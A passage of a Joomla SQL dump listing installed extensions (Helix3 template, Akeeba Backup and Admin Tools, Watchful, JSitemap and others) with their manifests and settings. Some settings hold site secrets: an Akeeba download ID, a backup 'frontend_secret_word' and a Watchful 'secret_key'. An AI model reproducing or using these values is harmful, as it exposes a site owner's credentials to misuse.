Framework','plugin','helix3','system',0,1,1,0,'{\"name\":\"System - Helix3 Framework\",\"type\":\"plugin\",\"creationDate\":\"Jan 2015\",\"author\":\"JoomShaper.com\",\"copyright\":\"Copyright (C) 2010 - 2015 JoomShaper. All rights reserved.\",\"authorEmail\":\"support@joomshaper.com\",\"authorUrl\":\"www.joomshaper.com\",\"version\":\"1.0\",\"description\":\"Helix3 Framework - Joomla Template Framework by JoomShaper\",\"group\":\"\",\"filename\":\"helix3\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10003,'shaper_helix3','template','shaper_helix3','',0,1,1,0,'{\"name\":\"shaper_helix3\",\"type\":\"template\",\"creationDate\":\"Jan 2015\",\"author\":\"JoomShaper.com\",\"copyright\":\"Copyright (C) 2010 - 2015 JoomShaper.com. All rights reserved.\",\"authorEmail\":\"support@joomshaper.com\",\"authorUrl\":\"http:\\/\\/www.joomshaper.com\",\"version\":\"1.0\",\"description\":\"Shaper Helix3 - Starter Template of Helix3 framework\",\"group\":\"\",\"filename\":\"templateDetails\"}','{\"sticky_header\":\"1\",\"boxed_layout\":\"0\",\"logo_type\":\"image\",\"logo_position\":\"logo\",\"body_bg_repeat\":\"inherit\",\"body_bg_size\":\"inherit\",\"body_bg_attachment\":\"inherit\",\"body_bg_position\":\"0 0\",\"enabled_copyright\":\"1\",\"copyright_position\":\"footer1\",\"copyright\":\"\\u00a9 2015 Your Company. All Rights Reserved. Designed By JoomShaper\",\"show_social_icons\":\"1\",\"social_position\":\"top1\",\"enable_contactinfo\":\"1\",\"contact_position\":\"top2\",\"contact_phone\":\"+228 872 4444\",\"contact_email\":\"contact@email.com\",\"comingsoon_mode\":\"0\",\"comingsoon_title\":\"Coming Soon Title\",\"comingsoon_date\":\"5-10-2018\",\"comingsoon_content\":\"Coming soon content\",\"preset\":\"preset1\",\"preset1_bg\":\"#ffffff\",\"preset1_text\":\"#000000\",\"preset1_major\":\"#22b8f0\",\"preset2_bg\":\"#f2f2f2\",\"preset2_text\":\"#666666\",\"preset2_major\":\"#22b8f0\",\"preset3_bg\":\"#f2f2f2\",\"preset3_text\":\"#666666\",\"preset3_major\":\"#22b8f0\",\"menu\":\"mainmenu\",\"menu_type\":\"1\",\"menu_animation\":\"1\",\"enable_body_font\":\"0\",\"enable_h1_font\":\"0\",\"enable_h2_font\":\"0\",\"enable_h3_font\":\"0\",\"enable_h4_font\":\"0\",\"enable_h5_font\":\"0\",\"enable_h6_font\":\"0\",\"enable_navigation_font\":\"0\",\"enable_custom_font\":\"0\",\"compress_css\":\"0\",\"compress_js\":\"0\",\"lessoption\":\"0\",\"show_post_format\":\"1\",\"commenting_engine\":\"disqus\",\"disqus_devmode\":\"0\",\"intensedebate_acc\":\"\",\"fb_width\":\"500\",\"fb_cpp\":\"10\",\"comments_count\":\"1\",\"social_share\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(10016,'Admintools','component','com_admintools','',1,1,0,0,'{\"name\":\"Admintools\",\"type\":\"component\",\"creationDate\":\"2016-02-08\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2010-2016 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@akeebabackup.com\",\"authorUrl\":\"http:\\/\\/www.akeebabackup.com\",\"version\":\"3.7.1\",\"description\":\"Security and utilitarian tools for Joomla! site administrators\",\"group\":\"\",\"filename\":\"admintools\"}','{\"scandiffs\":\"0\",\"scanemail\":\"\",\"showstats\":\"1\",\"longconfigpage\":\"0\",\"reorderplugin\":\"1\",\"downloadid\":\"e71ed15695d9335d00057d6681477e90\",\"autoupdateCli\":\"1\",\"notificationFreq\":\"1\",\"notificationTime\":\"day\",\"notificationEmail\":\"\",\"stats_enabled\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(10017,'System - Admin Tools','plugin','admintools','system',0,1,1,0,'{\"name\":\"System - Admin Tools\",\"type\":\"plugin\",\"creationDate\":\"2016-02-08\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2010-2016 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@akeebabackup.com\",\"authorUrl\":\"http:\\/\\/www.akeebabackup.com\",\"version\":\"3.7.1\",\"description\":\"\\n\\t\\tHandles URL redirections defined in Admin Tools, fends off common attacks\\n\\t\\tand automates session table and cache clean-up\\n\\t\",\"group\":\"\",\"filename\":\"admintools\"}','{\"language_override\":\"\",\"@spacer\":\"\",\"sesoptimizer\":\"0\",\"sesopt_freq\":\"60\",\"sescleaner\":\"0\",\"ses_freq\":\"60\",\"cachecleaner\":\"0\",\"cache_freq\":\"1440\",\"cacheexpire\":\"0\",\"cacheexp_freq\":\"60\",\"cleantemp\":\"0\",\"cleantemp_freq\":\"60\",\"deleteinactive\":\"0\",\"deleteinactive_days\":\"7\",\"maxlogentries\":\"0\"}','','',0,'0000-00-00 00:00:00',-1,0),(10018,'System - One Click Action','plugin','oneclickaction','system',0,0,1,0,'{\"name\":\"System - One Click Action\",\"type\":\"plugin\",\"creationDate\":\"2011-05-26\",\"author\":\"Nicholas K. Dionysopoulos \\/ AkeebaBackup.com\",\"copyright\":\"Copyright (c)2011-2016 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@dionysopoulos.me\",\"authorUrl\":\"http:\\/\\/www.akeebabackup.com\",\"version\":\"2.1\",\"description\":\"PLG_ONCECLICK_DESCRIPTION\",\"group\":\"\",\"filename\":\"oneclickaction\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10019,'System - Admin Tools Update Email','plugin','atoolsupdatecheck','system',0,0,1,0,'{\"name\":\"System - Admin Tools Update Email\",\"type\":\"plugin\",\"creationDate\":\"2011-05-26\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2011-2016 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@dionysopoulos.me\",\"authorUrl\":\"http:\\/\\/www.akeebabackup.com\",\"version\":\"1.0\",\"description\":\"PLG_ATOOLSUPDATECHECK_DESCRIPTION2\",\"group\":\"\",\"filename\":\"atoolsupdatecheck\"}','{\"language_override\":\"\",\"email\":\"\",\"singleclick\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(10020,'System - Admin Tools Joomla! Update Email','plugin','atoolsjupdatecheck','system',0,0,1,0,'{\"name\":\"System - Admin Tools Joomla! Update Email\",\"type\":\"plugin\",\"creationDate\":\"2011-05-26\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2011-2016 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@dionysopoulos.me\",\"authorUrl\":\"http:\\/\\/www.akeebabackup.com\",\"version\":\"1.0\",\"description\":\"PLG_ATOOLSJUPDATECHECK_DESCRIPTION2\",\"group\":\"\",\"filename\":\"atoolsjupdatecheck\"}','{\"email\":\"\",\"singleclick\":\"0\",\"lastrun\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(10022,'AkeebaStrapper','file','AkeebaStrapper','',0,1,0,0,'{\"name\":\"AkeebaStrapper\",\"type\":\"file\",\"creationDate\":\"2016-02-19\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"(C) 2012-2013 Akeeba Ltd.\",\"authorEmail\":\"nicholas@dionysopoulos.me\",\"authorUrl\":\"https:\\/\\/www.akeebabackup.com\",\"version\":\"2.5.3\",\"description\":\"Namespaced jQuery, jQuery UI and Bootstrap for Akeeba products.\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10023,'Akeeba','component','com_akeeba','',1,1,0,0,'{\"name\":\"Akeeba\",\"type\":\"component\",\"creationDate\":\"2016-02-19\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2006-2016 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@dionysopoulos.me\",\"authorUrl\":\"http:\\/\\/www.akeebabackup.com\",\"version\":\"4.5.5\",\"description\":\"Akeeba Backup Pro - Full Joomla! site backup solution, Professional Edition\",\"group\":\"\",\"filename\":\"akeeba\"}','{\"frontend_enable\":\"0\",\"failure_frontend_enable\":\"0\",\"frontend_secret_word\":\"u5vWea\",\"frontend_email_on_finish\":\"0\",\"frontend_email_address\":\"\",\"frontend_email_subject\":\"\",\"frontend_email_body\":\"\",\"failure_timeout\":180,\"failure_email_address\":\"\",\"failure_email_subject\":\"\",\"failure_email_body\":\"\",\"siteurl\":\"http:\\/\\/localhost:8888\\/dashlogic\\/\",\"jversion\":\"1.6\",\"jlibrariesdir\":\"\\/Applications\\/MAMP\\/htdocs\\/dashlogic\\/libraries\",\"lastversion\":\"\",\"angieupgrade\":\"0\",\"update_dlid\":\"e71ed15695d9335d00057d6681477e90\",\"displayphpwarning\":\"1\",\"autoupdateCli\":\"1\",\"notificationFreq\":\"1\",\"notificationTime\":\"day\",\"notificationEmail\":\"\",\"stats_enabled\":\"1\",\"useencryption\":\"1\",\"dateformat\":\"\",\"desktop_notifications\":\"0\",\"push_preference\":\"0\",\"push_apikey\":\"\",\"confwiz_upgrade\":1,\"show_howtorestoremodal\":0}','','',0,'0000-00-00 00:00:00',0,0),(10024,'plg_quickicon_akeebabackup','plugin','akeebabackup','quickicon',0,1,1,0,'{\"name\":\"plg_quickicon_akeebabackup\",\"type\":\"plugin\",\"creationDate\":\"2012-09-26\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2009-2016 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@akeebabackup.com\",\"authorUrl\":\"http:\\/\\/www.akeebabackup.com\",\"version\":\"1.0\",\"description\":\"PLG_QUICKICON_AKEEBABACKUP_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"akeebabackup\"}','{\"context\":\"mod_quickicon\",\"enablewarning\":\"1\",\"warnfailed\":\"1\",\"maxbackupperiod\":\"24\"}','','',0,'0000-00-00 00:00:00',0,0),(10025,'PLG_SYSTEM_AKEEBAUPDATECHECK_TITLE','plugin','akeebaupdatecheck','system',0,0,1,0,'{\"name\":\"PLG_SYSTEM_AKEEBAUPDATECHECK_TITLE\",\"type\":\"plugin\",\"creationDate\":\"2011-05-26\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2009-2016 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@dionysopoulos.me\",\"authorUrl\":\"http:\\/\\/www.akeebabackup.com\",\"version\":\"1.1\",\"description\":\"PLG_AKEEBAUPDATECHECK_DESCRIPTION2\",\"group\":\"\",\"filename\":\"akeebaupdatecheck\"}','{\"language_override\":\"\",\"email\":\"\",\"singleclick\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(10026,'PLG_SYSTEM_BACKUPONUPDATE_TITLE','plugin','backuponupdate','system',0,1,1,0,'{\"name\":\"PLG_SYSTEM_BACKUPONUPDATE_TITLE\",\"type\":\"plugin\",\"creationDate\":\"2013-08-13\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2009-2016 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@dionysopoulos.me\",\"authorUrl\":\"http:\\/\\/www.akeebabackup.com\",\"version\":\"3.7\",\"description\":\"PLG_SYSTEM_BACKUPONUPDATE_DESCRIPTION\",\"group\":\"\",\"filename\":\"backuponupdate\"}','{\"profileid\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(10027,'WATCHFULLI','component','com_watchfulli','',1,1,0,0,'{\"name\":\"WATCHFULLI\",\"type\":\"component\",\"creationDate\":\"2016-01-27\",\"author\":\"watchful.li\",\"copyright\":\"\",\"authorEmail\":\"\",\"authorUrl\":\"https:\\/\\/watchful.li\",\"version\":\"1.10.6\",\"description\":\"COM_WATCHFULLI_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"watchfulli\"}','{\"secret_key\":\"acf2a291f53b122af4cb3f07e1770aa3\"}','','',0,'0000-00-00 00:00:00',0,0),(10028,'ImageRecycle','component','com_imagerecycle','',1,1,0,0,'{\"name\":\"ImageRecycle\",\"type\":\"component\",\"creationDate\":\"01-October-2014\",\"author\":\"ImageRecycle\",\"copyright\":\"\",\"authorEmail\":\"contact@imagerecycle.com\",\"authorUrl\":\"http:\\/\\/www.imagerecycle.com\",\"version\":\"1.0.2\",\"description\":\"COM_IMAGERECYCLE_DESCRIPTION\",\"group\":\"\",\"filename\":\"com_imagerecycle\"}','{\"api_url\":\"https:\\/\\/api.imagerecycle.com\\/v1\\/\",\"api_key\":\"\",\"api_secret\":\"\",\"installed_time\":\"1445757801\",\"include_folders\":\"images,media,templates\",\"resize_auto\":\"0\",\"resize_image\":\"1600\",\"min_size\":\"1\",\"max_size\":\"5120\",\"compression_type\":\"lossy\",\"compression_type_pdf\":\"lossy\",\"compression_type_png\":\"lossy\",\"compression_type_jpg\":\"lossy\",\"compression_type_gif\":\"lossy\",\"optimize_newmedia_auto\":\"0\",\"auto_method\":\"ajax\",\"run_periodicity\":\"5\",\"last_run\":\"\",\"hideupdate\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(10029,'Content - imagerecycle','plugin','imagerecycle','content',0,1,1,0,'{\"name\":\"Content - imagerecycle\",\"type\":\"plugin\",\"creationDate\":\"01-May-2015\",\"author\":\"ImageRecycle\",\"copyright\":\"\",\"authorEmail\":\"contact@imagerecycle.com\",\"authorUrl\":\"http:\\/\\/www.imagerecycle.com\",\"version\":\"1.0.2\",\"description\":\"Content plugin for Imagerecycle\",\"group\":\"\",\"filename\":\"imagerecycle\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10030,'JMap','component','com_jmap','',1,1,0,0,'{\"name\":\"JMap\",\"type\":\"component\",\"creationDate\":\"January 2015\",\"author\":\"Joomla! Extensions Store\",\"copyright\":\"Copyright (C) 2015 - Joomla! Extensions Store. All Rights Reserved.\",\"authorEmail\":\"info@storejextensions.org\",\"authorUrl\":\"http:\\/\\/storejextensions.org\",\"version\":\"3.0\",\"description\":\"COM_JMAP_INFO_MESSAGES\",\"group\":\"\",\"filename\":\"jmap\"}','{\"show_title\":\"1\",\"defaulttitle\":\"\",\"headerlevel\":\"1\",\"classdiv\":\"sitemap\",\"show_pagebreaks\":\"0\",\"opentarget\":\"_self\",\"include_external_links\":\"1\",\"sitemap_html_template\":\"\",\"show_icons\":\"1\",\"animated\":\"1\",\"animate_speed\":\"200\",\"minheight_root_folders\":\"35\",\"minheight_sub_folders\":\"30\",\"minheight_leaf\":\"20\",\"minwidth_columns\":\"120\",\"font_size_boxes\":\"12\",\"root_folders_color\":\"#F60\",\"root_folders_border_color\":\"#943B00\",\"root_folders_text_color\":\"#FFF\",\"sub_folders_color\":\"#99CDFF\",\"sub_folders_border_color\":\"#11416F\",\"sub_folders_text_color\":\"#11416F\",\"leaf_folders_color\":\"#EBEBEB\",\"leaf_folders_border_color\":\"#6E6E6E\",\"leaf_folders_text_color\":\"#505050\",\"connections_color\":\"#CCC\",\"expand_iconset\":\"square-blue\",\"draggable_sitemap\":\"0\",\"show_expanded\":\"0\",\"expand_location\":\"location\",\"column_sitemap\":\"0\",\"column_maxnum\":\"3\",\"multilevel_categories\":\"0\",\"enable_view_cache\":\"0\",\"lifetime_view_cache\":\"1\",\"enable_precaching\":\"0\",\"precaching_limit_xml\":\"5000\",\"precaching_limit_images\":\"50\",\"split_sitemap\":\"0\",\"split_chunks\":\"50000\",\"splitting_hardcoded_rootnode\":\"1\",\"gnews_publication_name\":\"\",\"gnews_limit_recent\":\"0\",\"gnews_limit_valid_days\":\"2\",\"gnews_genres\":[\"Blog\"],\"imagetitle_processor\":\"title|alt\",\"max_images_requests\":\"50\",\"fake_images_processor\":\"0\",\"sh404sef_multilanguage\":\"0\",\"rss_channel_name\":\"\",\"rss_channel_description\":\"\",\"rss_channel_image\":\"\",\"rss_webmaster_name\":\"\",\"rss_webmaster_email\":\"\",\"rss_channel_excludewords\":\"\",\"include_archived\":\"0\",\"multiple_content_sources\":\"0\",\"disable_acl\":\"enabled\",\"showalways_language_dropdown\":\"\",\"lists_limit_pagination\":\"10\",\"selectable_limit_pagination\":\"10\",\"seostats_custom_link\":\"\",\"seostats_enabled\":\"1\",\"autoping\":\"0\",\"sitemap_links_sef\":\"0\",\"sitemap_links_random\":\"0\",\"append_livesite\":\"1\",\"custom_sitemap_domain\":\"\",\"custom_http_port\":\"\",\"includejquery\":\"1\",\"enable_debug\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(10031,'System - JSitemap utilities','plugin','jmap','system',0,1,1,0,'{\"name\":\"System - JSitemap utilities\",\"type\":\"plugin\",\"creationDate\":\"January 2015\",\"author\":\"Joomla! Extensions Store\",\"copyright\":\"Copyright (C) 2015 - Joomla! Extensions Store. All Rights Reserved.\",\"authorEmail\":\"info@storejextensions.org\",\"authorUrl\":\"http:\\/\\/storejextensions.org\",\"version\":\"3.0\",\"description\":\"JSitemap utilities plugin\",\"group\":\"\",\"filename\":\"jmap\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10032,'Content - JSitemap Pingomatic','plugin','pingomatic','content',0,1,1,0,'{\"name\":\"Content - JSitemap Pingomatic\",\"type\":\"plugin\",\"creationDate\":\"January 2015\",\"author\":\"Joomla! Extensions Store\",\"copyright\":\"Copyright (C) 2015 - Joomla! Extensions Store. All Rights Reserved.\",\"authorEmail\":\"info@storejextensions.org\",\"authorUrl\":\"http:\\/\\/storejextensions.org\",\"version\":\"3.0\",\"description\":\"JSitemap Pingomatic plugin\",\"group\":\"\",\"filename\":\"pingomatic\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10033,'JSitemap module','module','mod_jmap','',0,1,0,0,'{\"name\":\"JSitemap module\",\"type\":\"module\",\"creationDate\":\"January 2015\",\"author\":\"Joomla! Extensions Store\",\"copyright\":\"Copyright (C) 2015 - Joomla! Extensions Store. All Rights Reserved.\",\"authorEmail\":\"info@storejextensions.org\",\"authorUrl\":\"http:\\/\\/storejextensions.org\",\"version\":\"3.0\",\"description\":\"JSitemap Module\",\"group\":\"\",\"filename\":\"mod_jmap\"}','{\"scrolling\":\"auto\",\"width\":\"100%\",\"height\":\"200\",\"height_auto\":\"1\",\"sitemap_html_template\":\"\",\"show_icons\":\"\",\"show_expanded\":\"\",\"expand_location\":\"\",\"column_sitemap\":\"\",\"column_maxnum\":\"\",\"multilevel_categories\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}','','',0,'0000-00-00 00:00:00',0,0),(10034,'JSitemap Quickicons','module','mod_jmapquickicon','',1,1,2,0,'{\"name\":\"JSitemap Quickicons\",\"type\":\"module\",\"creationDate\":\"January 2015\",\"author\":\"Joomla! Extensions Store\",\"copyright\":\"Copyright (C) 2015 - Joomla! Extensions Store. All Rights Reserved.\",\"authorEmail\":\"info@storejextensions.org\",\"authorUrl\":\"http:\\/\\/storejextensions.org\",\"version\":\"3.0\",\"description\":\"JSitemap Quickicons module\",\"group\":\"\",\"filename\":\"mod_jmapquickicon\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10035,'System - Google Analytics','plugin','GoogleAnalytics','system',0,0,1,0,'{\"name\":\"System - Google Analytics\",\"type\":\"plugin\",\"creationDate\":\"19th April 2010\",\"author\":\"Peter Bui\",\"copyright\":\"Copyright (c) 2015 PB Web Development. All rights reserved.\",\"authorEmail\":\"peter@pbwebdev.com.au\",\"authorUrl\":\"http:\\/\\/pbwebdev.com\",\"version\":\"4.6.1\",\"description\":\"\\n \\n <p style=\\\"text-align:left\\\">\\n New and update rewrite of the popular Google Anaytics for Joomla FREE. Asynchronous code for Google Analytics is now\\n old and has been superseeded by Google\'s new \\\"UNIVERSAL ANALYTICS\\\".\\n <\\/p>\\n <p style=\\\"text-align:left\\\">\\n This plugin will allow you to choose between the two options of the new universal analytics code or the old\\n asynchronous version of the analytics code.\\n <\\/p>\\n\\n <h2 style=\\\"text-align:left\\\">Upgrade to PRO<\\/h2>\\n\\n <p style=\\\"text-align:left\\\">\\n You can also upgrade to <a href=\\\"http:\\/\\/nicheextensions.com\\/extensions\\/google-analytics\\\" taget=\\\"_blank\\\"><strong>Google Analytics PRO<\\/strong><\\/a> for more features and fine tuning of your analytics.\\n <\\/p>\\n\\n <h2 style=\\\"text-align:left\\\">Documentation<\\/h2>\\n <p style=\\\"text-align:left\\\">\\n Read the documentation at: <a href=\\\"http:\\/\\/nicheextensions.com\\/documentation\\/3-google-analytics-for-joomla\\\" target=\\\"_blank\\\">http:\\/\\/nicheextensions.com\\/documentation\\/3-google-analytics-for-joomla<\\/a> for more\\n information.\\n <\\/p>\\n\\n <h2 style=\\\"text-align:left\\\">An Overview<\\/h2>\\n\\n <iframe width=\\\"100%\\\" height=\\\"auto\\\" src=\\\"https:\\/\\/www.youtube.com\\/embed\\/58QMSW5bbCs\\\" frameborder=\\\"0\\\" allowfullscreen><\\/iframe>\\n\\n <h2 style=\\\"text-align:left\\\">FAQs<\\/h2>\\n <h3 style=\\\"text-align:left\\\">Why doesn\'t Google say it can\'t detect my analytics code when clearly I can see it on the website?<\\/h3>\\n <p style=\\\"text-align:left\\\">\\n This usually happens when the information is sent to Google before the plugin was enabled and is being caches. Check back in 12 hours and make sure that the information still isn\'t coming through. Make sure you also check the ID for any spaces before or after the ID as this can also cause issues.<\\/p>\\n <h3 style=\\\"text-align:left\\\">How can I be certain that the information is being passed through?<\\/h3>\\n <p style=\\\"text-align:left\\\">\\n You can also use the Google analytics Real Time tracking to see if the data is coming in or not. If you see active users on the site with the real time data then the information is coming in to Google Analytics from your website.<\\/p>\\n \\n \",\"group\":\"\",\"filename\":\"GoogleAnalytics\"}','{\"type\":\"universal\",\"code\":\"UA-XXXXX-X\",\"domain\":\"auto\",\"verify\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(10038,'News Show Pro GK5','module','mod_news_pro_gk5','',0,1,0,0,'{\"name\":\"News Show Pro GK5\",\"type\":\"module\",\"creationDate\":\"20\\/03\\/2015\",\"author\":\"Gavick.com\",\"copyright\":\"(C) 2009-2015 Gavick.com\",\"authorEmail\":\"info@gavick.com\",\"authorUrl\":\"www.gavick.com\",\"version\":\"1.8.2\",\"description\":\"\\n\\t\\n\\t\\t<style type=\'text\\/css\'>\\n\\t\\t\\tspan.readonly { padding: 10px; font-family: Arial; font-size:13px !important; font-weight: normal !important; text-align: justify; color: #4d4d4d; line-height: 24px; } \\n\\t\\t\\tspan.readonly h1 { clear:both; font-family: Georgia, sans-serif; font-size:38px; margin:30px 20px 23px; padding:0px 0px 24px 10px; color:#333; border-bottom: 1px solid #eee; font-weight: normal; } \\n\\t\\t\\tspan.readonly p { margin: 0 26px 10px } \\n\\t\\t\\tspan.readonly p a { color: #ef6b09 } \\n\\t\\t\\tspan.readonly p.homepage { margin-top: 30px } \\n\\t\\t\\tspan.readonly p.license { border-top: 1px solid #eee; font-size: 11px; margin: 30px 26px 0; padding: 6px 0; }\\n\\t\\t\\tspan.tooltip-content { display: none; }\\n\\t\\t\\t.tip-text span.readonly { display: none; }\\n\\t\\t\\t.tip-text span.tooltip-content { display: block; }\\n\\t\\t\\t\\n\\t\\t<\\/style>\\n\\t\\t<span class=\'readonly\'>\\n\\t\\t\\t<h1>News Show Pro GK5 <small>ver. 1.8.2<\\/small><\\/h1>\\n\\t\\t\\t<p>GK5 is new generation of our extensions dedicated to Joomla 3+.<\\/p>\\n\\t\\t\\t<p>Basing on experiences gathered, we created probably the best tool to present articles for Joomla! Huge amount of options and possibilities of formatting causes News Show Pro GK5 is a complex tool in making www pages content attractive. News Show Pro is appropriate while preparing simple structures with an individual article, the same as, complex arrangements including few articles and a list of links.<\\/p> \\n\\t\\t\\t<p class=\'homepage\'><a href=\'http:\\/\\/www.gavick.com\\/news-show-pro-gk5.html\' target=\'_blank\'>Learn more at the NSP GK5 project website.<\\/a><\\/p>\\n\\t\\t\\t<p class=\'license\'>News Show Pro GK5 is released under the <a target=\\\"_blank\\\" href=\\\"http:\\/\\/www.gnu.org\\/licenses\\/gpl-2.0.html\\\">GNU\\/GPL v2 license.<\\/a><\\/p>\\n\\t\\t<\\/span>\\n\\t\\t<span class=\'tooltip-content\'>Advanced content module for Joomla! 3<\\/span>\\n\\t\\n\\t\",\"group\":\"\",\"filename\":\"mod_news_pro_gk5\"}','{\"moduleclass_sfx\":\"\",\"module_unique_id\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\",\"module_mode\":\"normal\",\"use_own_article_format\":\"0\",\"article_format\":\"\",\"article_format_text\":\"\",\"data_source\":\"\",\"source_name\":\"com_content\",\"com_content_categories\":\"\",\"com_content_articles\":\"\",\"k2_categories\":\"\",\"k2_tags\":\"\",\"k2_authors\":\"\",\"k2_articles\":\"\",\"easyblog_categories\":\"\",\"easyblog_tags\":\"\",\"easyblog_authors\":\"\",\"easyblog_articles\":\"\",\"rss_feed\":\"\",\"json_file\":\"\",\"xml_file\":\"\",\"com_virtuemart_products\":\"\",\"com_virtuemart_categories\":\"\",\"com_hikashop_products\":\"\",\"com_hikashop_categories\":\"\",\"jomsocial_user_status\":\"\",\"jomsocial_user_photo\":\"\",\"news_sort_value\":\"created\",\"news_sort_order\":\"DESC\",\"offset\":\"0\",\"news_since\":\"\",\"news_in\":\"\",\"news_featured\":\"1\",\"only_featured\":\"0\",\"one_article_per_category\":\"0\",\"news_unauthorized\":\"0\",\"time_offset\":\"0\",\"thumb_image_type\":\"first\",\"com_content_comments_source\":\"none\",\"com_content_text_type\":\"introtext\",\"hide_current_com_content_article\":\"0\",\"k2_comments_source\":\"k2\",\"com_k2_text_type\":\"introtext\",\"hide_current_k2_article\":\"0\",\"k2_image_size\":\"Generic\",\"k2_get_extra_fields\":\"0\",\"hikashop_itemid\":\"9999\",\"hikashop_out_of_stock\":\"1\",\"hikashop_add_to_cart\":\"1\",\"rss_cache_time\":\"60\",\"easyblog_comments_source\":\"easyblog\",\"hide_current_easyblog_article\":\"0\",\"easyblog_image_size\":\"Generic\",\"vm_itemid\":\"9999\",\"vm_lang\":\"\",\"vm_shopper_group\":\"-1\",\"vm_out_of_stock\":\"1\",\"vm_show_price_type\":\"salesPrice\",\"vm_add_to_cart\":\"0\",\"vm_show_discount_amount\":\"0\",\"vm_show_tax\":\"0\",\"vm_display_type\":\"text_price\",\"vm_show_featured_badge\":\"0\",\"portal_mode_news_gallery_amount\":\"10\",\"portal_mode_news_gallery_cols\":\"3\",\"portal_mode_news_gallery_pagination_type\":\"arrows\",\"portal_mode_news_gallery_autoanimation\":\"1\",\"portal_mode_news_gallery_autoanimation_time\":\"5000\",\"portal_mode_product_gallery_amount\":\"10\",\"portal_mode_product_gallery_cols\":\"3\",\"portal_mode_product_gallery_nav\":\"1\",\"portal_mode_product_gallery_autoanimation\":\"1\",\"portal_mode_product_gallery_autoanimation_time\":\"5000\",\"portal_mode_product_gallery_2_rows\":\"2\",\"portal_mode_product_gallery_2_cols\":\"4\",\"portal_mode_product_gallery_2_button\":\"cart\",\"portal_mode_news_blocks_cols\":\"2\",\"portal_mode_news_blocks_rows\":\"2\",\"portal_mode_title_overlay_text_pos\":\"top\",\"portal_mode_title_overlay_text_padding\":\"30px\",\"portal_mode_title_overlay_text_bg\":\"transparent\",\"portal_mode_title_overlay_text_width\":\"100\",\"portal_mode_centered_title_overlay_text_bg\":\"\",\"portal_mode_centered_title_limit_type\":\"chars\",\"portal_mode_centered_title_limit\":\"40\",\"portal_mode_centered_text_limit_type\":\"words\",\"portal_mode_centered_text_limit\":\"30\",\"portal_mode_portfolio_initial_anim\":\"0\",\"portal_mode_portfolio_cols\":\"3\",\"portal_mode_portfolio_rows\":\"3\",\"portal_mode_portfolio_pages\":\"3\",\"portal_mode_portfolio_link\":\"1\",\"portal_mode_portfolio_link_url\":\"\",\"portal_mode_portfolio2_cols\":\"3\",\"portal_mode_portfolio2_rows\":\"3\",\"portal_mode_portfolio2_filter\":\"1\",\"portal_mode_portfolio2_popup\":\"1\",\"portal_mode_speakers_list_cols\":\"2\",\"portal_mode_speakers_list_rows\":\"2\",\"portal_mode_grid_title_overlay_text_pos\":\"none\",\"portal_mode_grid_title_overlay_text_color\":\"light\",\"portal_mode_grid_title_overlay_text_padding\":\"30px\",\"portal_mode_frontpage_image_overlay_text_color\":\"light\",\"portal_mode_frontpage_image_overlay_title\":\"1\",\"portal_mode_frontpage_image_overlay_text\":\"1\",\"portal_mode_frontpage_image_overlay_text_limit\":\"100\",\"portal_mode_frontpage_image_overlay_readon\":\"1\",\"portal_mode_frontpage_image_overlay_readon_text\":\"\",\"portal_mode_highlights_readmore\":\"\",\"portal_mode_highlights_amount\":\"7\",\"portal_mode_highlights_date_format\":\"\",\"portal_mode_highlights_title_limit_type\":\"chars\",\"portal_mode_highlights_title_limit\":\"40\",\"portal_mode_video_gallery_popup\":\"1\",\"portal_mode_video_gallery_popup_x\":\"640\",\"portal_mode_video_gallery_popup_y\":\"480\",\"portal_mode_video_gallery_pages\":\"2\",\"portal_mode_video_gallery_per_page\":\"3\",\"portal_mode_video_gallery_title_limit_type\":\"chars\",\"portal_mode_video_gallery_title_limit\":\"40\",\"portal_mode_video_gallery_text_limit_type\":\"chars\",\"portal_mode_video_gallery_text_limit\":\"60\",\"portal_mode_video_gallery_autoanimation\":\"5000\",\"portal_mode_video_list_popup\":\"1\",\"portal_mode_video_list_popup_x\":\"640\",\"portal_mode_video_list_popup_y\":\"480\",\"portal_mode_video_list_pages\":\"2\",\"portal_mode_video_list_per_page\":\"3\",\"portal_mode_video_list_title\":\"1\",\"portal_mode_video_list_date\":\"1\",\"portal_mode_video_list_title_limit_type\":\"chars\",\"portal_mode_video_list_title_limit\":\"40\",\"portal_mode_events_list_cols\":\"2\",\"portal_mode_events_list_rows\